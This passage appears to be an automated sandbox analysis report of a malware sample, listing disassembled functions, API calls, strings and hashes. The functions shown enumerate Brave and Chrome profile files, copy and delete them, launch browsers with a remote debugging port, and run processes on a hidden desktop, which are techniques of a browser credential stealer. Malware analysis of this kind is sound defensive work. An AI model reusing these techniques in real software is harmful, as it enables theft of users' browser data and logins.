                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2127927946-2218711628
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D
                                                                                                                                                                                                                                                                                                                                  Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1064 40be40-40bed2 call 41aa50 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 2 call 41aa50 * 2 call 41ade0 FindFirstFileA 1083 40bed4-40bf22 call 41ab10 * 6 call 401550 call 41ab10 * 2 1064->1083 1084 40bf27-40bf3b StrCmpCA 1064->1084 1139 40c90f-40c912 1083->1139 1086 40bf53 1084->1086 1087 40bf3d-40bf51 StrCmpCA 1084->1087 1090 40c89e-40c8b1 FindNextFileA 1086->1090 1087->1086 1089 40bf58-40bfd1 call 41ab30 call 41ac30 call 41acc0 * 2 call 41abb0 call 41ab10 * 3 1087->1089 1140 40c062-40c0e3 call 41acc0 * 4 call 41abb0 call 41ab10 * 4 1089->1140 1141 40bfd7-40c05d call 41acc0 * 4 call 41abb0 call 41ab10 * 4 1089->1141 1090->1084 1093 40c8b7-40c8c4 FindClose call 41ab10 1090->1093 1099 40c8c9-40c90a call 41ab10 * 5 call 401550 call 41ab10 * 2 1093->1099 1099->1139 1179 40c0e8-40c0fe call 41ade0 StrCmpCA 1140->1179 1141->1179 1182 40c104-40c118 StrCmpCA 1179->1182 1183 40c2c5-40c2db StrCmpCA 1179->1183 1182->1183 1184 40c11e-40c238 call 41aa50 call 418cf0 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 3 call 41ade0 * 2 CopyFileA call 41aa50 call 41acc0 * 2 call 41abb0 call 41ab10 * 2 call 41aab0 call 40a110 1182->1184 1185 40c330-40c346 StrCmpCA 1183->1185 1186 40c2dd-40c320 call 401590 call 41aab0 * 3 call 40a990 1183->1186 1350 40c287-40c2c0 call 41ade0 DeleteFileA call 41ad50 call 41ade0 call 41ab10 * 2 1184->1350 1351 40c23a-40c282 call 41aab0 call 401590 call 4153e0 call 41ab10 1184->1351 1188 40c40a-40c422 call 41aab0 call 418f20 1185->1188 1189 40c34c-40c363 call 41ade0 StrCmpCA 1185->1189 1248 40c325-40c32b 1186->1248 1214 40c428-40c42f 1188->1214 1215 40c58a-40c59f StrCmpCA 1188->1215 1200 40c405 1189->1200 1201 40c369-40c3ff memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 3 call 401590 call 409e30 1189->1201 1205 40c7fe-40c807 1200->1205 1201->1200 1211 40c80d-40c883 call 41aab0 * 2 call 401590 call 41aab0 * 2 call 41aa50 call 40be40 1205->1211 1212 40c88e-40c899 call 41ad50 * 2 1205->1212 1315 40c888 1211->1315 1212->1090 1223 40c435-40c43c 1214->1223 1224 40c4eb-40c57a memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1214->1224 1221 40c792-40c7a7 StrCmpCA 1215->1221 1222 40c5a5-40c70e call 41aa50 call 41acc0 call 41abb0 call 41ab10 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41ade0 * 2 CopyFileA call 401590 call 41aab0 * 3 call 40aec0 call 401590 call 41aab0 * 3 call 40b4c0 call 41ade0 StrCmpCA 1215->1222 1221->1205 1232 40c7a9-40c7f3 call 401590 call 41aab0 * 3 call 40b200 1221->1232 1383 40c710-40c75d call 401590 call 41aab0 * 3 call 40ba50 1222->1383 1384 40c768-40c780 call 41ade0 DeleteFileA call 41ad50 1222->1384 1225 40c442-40c4e0 memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1223->1225 1226 40c4e6 1223->1226 1312 40c57f 1224->1312 1225->1226 1241 40c585 1226->1241 1305 40c7f8 1232->1305 1241->1205 1248->1205 1305->1205 1312->1241 1315->1212 1350->1183 1351->1350 1400 40c762 1383->1400 1391 40c785-40c790 call 41ab10 1384->1391 1391->1205 1400->1384
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C8A9
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                                                                                                                                                                                                                                                                                                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                                                                                                                                                                                                                                                                                                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                                                                                                                                                                                                                                                                                                                  • Preferences, xrefs: 0040C104
                                                                                                                                                                                                                                                                                                                                  • \Brave\Preferences, xrefs: 0040C1C1
                                                                                                                                                                                                                                                                                                                                  • Google Chrome, xrefs: 0040C6F8
                                                                                                                                                                                                                                                                                                                                  • Brave, xrefs: 0040C0E8
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3334442632-1869280968
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 81a485b5300898451b9458379c3d3955b512a0ebaaeabe2ced3ac89ca0744f69
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81a485b5300898451b9458379c3d3955b512a0ebaaeabe2ced3ac89ca0744f69
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                                                                                                                                                                                                                                                                                                                  Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*$-SA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 180737720-309722913
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 786a6c3ae262c53a438ae9d923c69adcb57cf1f877962c263d70ec27b6c5ca10
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786a6c3ae262c53a438ae9d923c69adcb57cf1f877962c263d70ec27b6c5ca10
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                                                                                                                                                                                                                                                                                                                  Function 6C5D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1921 6c5d35a0-6c5d35be 1922 6c5d38e9-6c5d38fb call 6c60b320 1921->1922 1923 6c5d35c4-6c5d35ed InitializeCriticalSectionAndSpinCount getenv 1921->1923 1925 6c5d38fc-6c5d390c strcmp 1923->1925 1926 6c5d35f3-6c5d35f5 1923->1926 1925->1926 1928 6c5d3912-6c5d3922 strcmp 1925->1928 1929 6c5d35f8-6c5d3614 QueryPerformanceFrequency 1926->1929 1930 6c5d398a-6c5d398c 1928->1930 1931 6c5d3924-6c5d3932 1928->1931 1932 6c5d374f-6c5d3756 1929->1932 1933 6c5d361a-6c5d361c 1929->1933 1930->1929 1936 6c5d3938 1931->1936 1937 6c5d3622-6c5d364a _strnicmp 1931->1937 1934 6c5d375c-6c5d3768 1932->1934 1935 6c5d396e-6c5d3982 1932->1935 1933->1937 1938 6c5d393d 1933->1938 1941 6c5d376a-6c5d37a1 QueryPerformanceCounter EnterCriticalSection 1934->1941 1935->1930 1936->1932 1939 6c5d3944-6c5d3957 _strnicmp 1937->1939 1940 6c5d3650-6c5d365e 1937->1940 1938->1939 1939->1940 1942 6c5d395d-6c5d395f 1939->1942 1940->1942 1943 6c5d3664-6c5d36a9 GetSystemTimeAdjustment 1940->1943 1944 6c5d37b3-6c5d37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1941->1944 1945 6c5d37a3-6c5d37b1 1941->1945 1946 6c5d36af-6c5d3749 call 6c60c110 1943->1946 1947 6c5d3964 1943->1947 1948 6c5d37ed-6c5d37fa 1944->1948 1949 6c5d37fc-6c5d3839 LeaveCriticalSection 1944->1949 1945->1944 1946->1932 1947->1935 1948->1949 1951 6c5d383b-6c5d3840 1949->1951 1952 6c5d3846-6c5d38ac call 6c60c110 1949->1952 1951->1941 1951->1952 1956 6c5d38b2-6c5d38ca 1952->1956 1957 6c5d38dd-6c5d38e3 1956->1957 1958 6c5d38cc-6c5d38db 1956->1958 1957->1922 1958->1956 1958->1957
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C65F688,00001000), ref: 6C5D35D5
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5D35E0
                                                                                                                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C5D35FD
                                                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5D363F
                                                                                                                                                                                                                                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5D369F
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C5D36E4
                                                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C5D3773
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65F688), ref: 6C5D377E
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65F688), ref: 6C5D37BD
                                                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C5D37C4
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65F688), ref: 6C5D37CB
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65F688), ref: 6C5D3801
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C5D3883
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C5D3902
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C5D3918
                                                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C5D394C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f65abe38ac8cc8ca194be05f9ddb1b8a158288b6d15dbed5fa0d8990a030af57
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a992858f3ff45ee44ee68d1cdefe4118f3239f8d5353e18b08dbc61611f22fa6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65abe38ac8cc8ca194be05f9ddb1b8a158288b6d15dbed5fa0d8990a030af57
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EB1D771B093009FDB08DF2EC89461A7BF5BB8A700F65892DE499D3790D734A901CB8A
                                                                                                                                                                                                                                                                                                                                  Function 00409E30 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 157stringsleepprocessCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409E47
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00409E7F
                                                                                                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                                                                                                                                                                                                                                                                                                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409EED
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409F3D
                                                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409F9C
                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A013
                                                                                                                                                                                                                                                                                                                                  • CloseDesktop.USER32(00000000), ref: 0040A060
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
